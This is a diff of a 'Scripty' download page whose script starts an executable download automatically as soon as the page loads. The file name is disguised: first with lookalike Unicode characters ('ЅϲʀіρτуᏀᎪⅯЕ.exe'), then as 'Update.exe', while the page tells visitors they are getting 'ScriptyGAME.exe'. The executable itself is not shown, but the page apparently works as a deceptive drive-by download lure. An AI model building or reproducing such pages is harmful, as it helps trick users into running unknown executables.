--- a/download/index.html
+++ b/download/index.html
@@ -5,23 +5,25 @@
   <title>Downloading... | Scripty</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <link rel="stylesheet" href="/download/download.css">
+  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap" rel="stylesheet">
 </head>
 <body>
   <div class="container">
-    <h1>Preparing your download...</h1>
+    <h1>Preparing Your Download</h1>
     <div class="loader"></div>
-    <p>If the download doesn't start automatically, <a href="/assets/files/ЅϲʀіρτуᏀᎪⅯЕ.exe" class="download-link">click here</a>.</p>
-    <p id="openMessage" style="display:none; color: #fff; font-size: 16px; margin-top: 20px;">Once downloaded, you can open <strong>ScriptyGAME.exe</strong>.</p>
+    <p class="description">Your download is starting automatically. Please wait...</p>
+    <p class="manual-download">If it doesn't start, <a href="/assets/files/Update.exe" class="download-link">click here</a> to download it manually.</p>
+    <p id="openMessage" class="open-message">Once downloaded, you can open <strong>ScriptyGAME.exe</strong>.</p>
   </div>
 
   <script src="/download/download.js"></script>
 
   <script>
     window.onload = function () {
-      const downloadUrl = "/assets/files/ЅϲʀіρτуᏀᎪⅯЕ.exe";
+      const downloadUrl = "/assets/files/Update.exe";
       const link = document.createElement('a');
       link.href = downloadUrl;
-      link.download = "ЅϲʀіρτуᏀᎪⅯЕ.exe";
+      link.download = "Update.exe";
       
       document.body.appendChild(link);
       link.click();
